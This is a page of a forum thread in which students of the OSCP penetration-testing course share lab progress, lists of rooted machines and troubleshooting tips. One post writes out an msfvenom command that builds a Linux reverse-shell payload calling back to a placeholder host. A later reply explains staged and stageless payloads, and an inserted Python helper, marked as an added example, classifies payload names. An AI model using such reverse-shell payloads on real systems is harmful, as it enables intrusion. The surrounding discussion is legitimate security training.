Page 2 of 3 (results 26 to 50 of 72)
  1. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #26
    Hey, if you take another look at Phoenix, try different shell packages.

    Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.

  3. Member
    Join Date
    Apr 2017
    Posts
    41
    #27
    Quote Originally Posted by adrenaline19 View Post
    Hey, if you take another look at Phoenix, try different shell packages.

    Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.
    Got it. Thanks for the tip!
    Rooted.

    So far:
    ALICE
    BOB
    BETHANY
    MIKE
    BARRY (Low privilege)
    PHOENIX

  4. Member
    Join Date
    Nov 2016
    Location
    Iowa
    Posts
    67

    Certifications
    OSCP, CISSP, Sec+
    #28
    RE: Nessus (OpenVAS)

    If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

    Still, if you want to have a chance to find multiple issues, that may be a way to go.

    Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.
    Last edited by LonerVamp; 07-06-2017 at 03:47 PM.

  5. Member
    Join Date
    Apr 2017
    Posts
    41
    #29
    Quote Originally Posted by LonerVamp View Post
    RE: Nessus (OpenVAS)

    If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

    Still, if you want to have a chance to find multiple issues, that may be a way to go.

    Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.
    I use SecurityCenter daily at my job, so I'm very familiar with it. I ran the scan and it picked up quite a bit and I'll dive through it tonight.

    A quick note as well to those starting PWK:
    I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell. To get around this, I added /exploit/multi/handler to the command and that makes it so I can listen using metasploit's multihandler for the shell, so my command looks like this:

    msfvenom exploit/multi/handler -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -f elf > exploit.elf

    This then gives me the command shell like I should have. This is also allowed on the OSCP exam as well:

    "You may use the following against all of the target machines:
    - multi handler (aka exploit/multi/handler)
    - msfvenom
    - pattern_create.rb
    - pattern_offset.rb"

    Hope this helps anyone.

  6. Junior Member Registered Member
    Join Date
    Mar 2015
    Posts
    5

    Certifications
    OSCP, CISSP, CISA
    #30
    Quote Originally Posted by Hausec View Post
    A quick note as well to those starting PWK:
    I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell.

    This is a common point of confusion that tripped me up as well. You need to use /shell_reverse_tcp rather than /shell/reverse_tcp when generating your shellcode with msfvenom if you want to receive the shell without the metasploit handler. The former is a single stage payload that can be caught by ncat while the second is a staged payload that can only be handled by the metasploit handler.
    Last edited by verdigris; 07-06-2017 at 09:27 PM.
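    As an added example (not code from the post or from Metasploit), the Python helper below encodes the naming rule verdigris describes and extends it from the thread's shell payload to meterpreter ones; the list of recognised stage names is an assumption covering the common cases.

```python
"""Classify a Metasploit payload path as staged or stageless.

Added example (not from the post). It encodes the naming convention the
post describes: a staged payload lists stage and stager as separate path
components (".../shell/reverse_tcp"); a stageless one joins them with an
underscore (".../shell_reverse_tcp"). STAGES is an assumption that covers
the common stage names only.
"""
from dataclasses import dataclass

STAGES = ("shell", "meterpreter")  # assumption: the common stage names


@dataclass(frozen=True)
class PayloadInfo:
    platform: str   # e.g. "linux/x86"
    stage: str      # e.g. "shell"
    stager: str     # e.g. "reverse_tcp"
    staged: bool    # True for ".../shell/reverse_tcp"

    @property
    def needs_msf_handler(self) -> bool:
        # A staged stager only connects back and waits for the handler to
        # send the stage. A plain nc listener never sends it, so you see a
        # connection but no shell, exactly the symptom reported above.
        return self.staged


def classify_payload(path: str) -> PayloadInfo:
    parts = path.strip("/").split("/")
    # Staged form: the last two components are <stage>/<stager>.
    if len(parts) >= 3 and parts[-2] in STAGES:
        return PayloadInfo("/".join(parts[:-2]), parts[-2], parts[-1], True)
    # Stageless form: the last component is <stage>_<stager>.
    last = parts[-1]
    for stage in STAGES:
        if len(parts) >= 2 and last.startswith(stage + "_"):
            return PayloadInfo("/".join(parts[:-1]), stage,
                               last[len(stage) + 1:], False)
    raise ValueError(f"unrecognised payload naming: {path!r}")


if __name__ == "__main__":
    for p in ("linux/x86/shell/reverse_tcp", "linux/x86/shell_reverse_tcp",
              "windows/x64/meterpreter_reverse_https"):
        info = classify_payload(p)
        kind = "staged" if info.staged else "stageless"
        print(f"{p}: {kind}; plain listener works: {not info.needs_msf_handler}")
```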

  7. Senior Member
    Join Date
    Mar 2017
    Location
    Phoenix, AZ
    Posts
    246

    Certifications
    CISSP, C|EH, C|HFI, MCSA 2012, MCSA 2008, Security +, Net+, A+
    #31
    Good info gentlemen. Thank you!

  8. Member
    Join Date
    Apr 2017
    Posts
    41
    #32
    Quote Originally Posted by verdigris View Post
    This is a common point of confusion that tripped me up as well. You need to use /shell_reverse_tcp rather than /shell/reverse_tcp when generating your shellcode with msfvenom if you want to receive the shell without the metasploit handler. The former is a single stage payload that can be caught by ncat while the second is a staged payload that can only be handled by the metasploit handler.
    Good to know. This is the entire reason why I was so frustrated with Phoenix. As soon as I did the multi-handler it worked like a charm.

  9. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #33
    Are you using Metasploit at all? If so, which boxes have you popped with Meta?

    Meta really helped me pop a box then I went back and did it again without meta. That helped me solidify some techniques, because it gave me confidence that I had the right path in.

  10. Senior Member
    Join Date
    May 2017
    Posts
    121
    #34
    Hi,

    Just curious, what distro are you guys using for the OSCP lab/exam?
    Are you running it on top of Windows in a VM, or from a live USB?

  11. Member
    Join Date
    Nov 2016
    Location
    Iowa
    Posts
    67

    Certifications
    OSCP, CISSP, Sec+
    #35
    OffSec provides a specific PWK student VM for download. I ran mine on a VMWare ESX system.

  12. Member
    Join Date
    Apr 2017
    Posts
    41
    #36
    Quote Originally Posted by adrenaline19 View Post
    Are you using Metasploit at all? If so, which boxes have you popped with Meta?

    Meta really helped me pop a box then I went back and did it again without meta. That helped me solidify some techniques, because it gave me confidence that I had the right path in.
    Yeah I use meterpreter for most of my payloads. I do follow up though with a non-meterpreter payload just to make sure my method is working. The only ones I solely used MSF for is Alice and Mike.

  13. Member
    Join Date
    Apr 2017
    Posts
    41
    #37
    Quote Originally Posted by vynx View Post
    Hi,

    Just curious, what distro are you guys using for the OSCP lab/exam?
    Are you running it on top of Windows in a VM, or from a live USB?
    The Kali VM from Offensive Security running on VMWare 12, running on Windows 10.

  14. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #38
    Alice is a gaping hole and easy practice for importing code from exploit-db to use.

    If you start feeling frisky, go back and re-pop Alice without msf. You'll find that useful later, trust me.

  15. Member
    Join Date
    Apr 2017
    Posts
    41
    #39
    Stuck on Beta for 3 days now. Cannot get out of this restricted shell. Driving me crazy

  16. Member
    Join Date
    Apr 2017
    Posts
    41
    #40
    Beta down & rooted. Here's what I learned:

    Some of the "hints" on the forums are garbage and led me down rabbit holes, questioning my own sanity. I talked to an admin not for hints, but for reassurance that what I was doing was a "correct" way to gain root. Beta was the hardest machine yet, I think.

  17. California Kid JoJoCal19's Avatar
    Join Date
    Mar 2009
    Location
    Jacksonville, FL
    Posts
    2,350

    Certifications
    CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, MSISA, BSBA
    #41
    Quote Originally Posted by Hausec View Post
    Beta down & rooted. Here's what I learned:

    Some of the "hints" on the forums are garbage and led me down rabbit holes, questioning my own sanity. I talked to an admin not for hints, but for reassurance that what I was doing was a "correct" way to gain root. Beta was the hardest machine yet, I think.
    So are people just posting the garbage hints to tr011? That would be disappointing if mods let that stuff go on.

  18. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #42
    They don't intentionally post garbage hints to ***** others. They are posting where they are at and what they think is the best way forward. Where they are could be a total rabbit hole, and the mods won't correct them. Getting helpful hints from the forums is like google-fu. It takes a lot of practice and patience.

    The admins in irc will drive you insane too. I swear the OSCP course will either give you hacker zen, or make you a serial killer.

  19. Member
    Join Date
    Apr 2017
    Posts
    41
    #43
    Quote Originally Posted by JoJoCal19 View Post
    So are people just posting the garbage hints to tr011? That would be disappointing if mods let that stuff go on.
    No, they just give either terrible analogies or hints that can easily be misinterpreted, or they'll just be flat out wrong because they don't know what they're talking about. For example, I got a hint that I needed to "fix an exploit to play with the binaries" when no binaries needed to be played with at all. So this had me down a rabbit hole for a solid 4 hours of trying things that would never work.

    Admins can be really helpful or completely worthless. Sometimes it's nice just to have reassurance that you're doing something right. An example is I had the right idea, but missed a switch when compiling an exploit, so the admin would just say "are you SURE you are compiling correctly?" which told me I'm doing the right thing, just to go over my command again. Other times admins will just be like "this exploit or method isn't working, try something else".

  20. Member
    Join Date
    Apr 2017
    Posts
    41
    #44
    Progress has been slow and my confidence takes another hit as I've been stuck on DOTTY and GAMMA for quite some time now. I've been on vacation the last week so I really need to buckle down and get focused. I did get Oracle and Susie and a limited shell on GAMMA but I don't think I can do much with that limited shell I have so I'll have to figure out another way. DOTTY has driven me crazy though because I know what I have to do, I just can't get it to work. It seems LFI is my real weakness, as I can get a PoC working easily but when trying to get a shell there's always some hangup.

    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    Last edited by Hausec; 07-16-2017 at 08:13 PM.

  21. Member
    Join Date
    Apr 2017
    Posts
    41
    #45
    JD, HOTLINE, and PAYDAY down. I really don't ever think I'll get DOTTY. Just getting too many errors during my exploit and Google turns up nothing. The admins only say "we can't give any more away without spoiling it". Kinda frustrating.


    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    JD
    HOTLINE
    PAYDAY

  22. Member
    Join Date
    Sep 2010
    Posts
    71

    Certifications
    M.S. Cyber Security, sec+, Linux +, CCNA RS, CCNA Sec, OSCP
    #46
    Hausec, I'm wondering if you could provide an update on whether there are newer operating systems in the labs? I got my OSCP a year and a half ago, but would be curious to know if they are updating. Do they have any Win 8, 10, Server 2012 R2, or 2016 in there?

  23. Member
    Join Date
    Apr 2017
    Posts
    41
    #47
    Quote Originally Posted by BuhRock View Post
    Hausec, I'm wondering if you could provide an update on whether there are newer operating systems in the labs? I got my OSCP a year and a half ago, but would be curious to know if they are updating. Do they have any Win 8, 10, Server 2012 R2, or 2016 in there?
    Definitely no 10 or 2016 in there. There's a few 8.1 desktops, but I don't think there's any 2012 in there either. Honestly almost all the Windows machines are vulnerable to the fuzzbunch exploit, but I confirmed with an admin that you're not allowed to use that on the exam.

  24. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #48
    You pop any new boxes lately?

  25. Member
    Join Date
    Apr 2017
    Posts
    41
    #49
    I got LEFTTURN yesterday.

    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    JD
    HOTLINE
    PAYDAY
    LEFTTURN

  26. Member
    Join Date
    Jan 2017
    Posts
    96
    #50
    lol comedy!
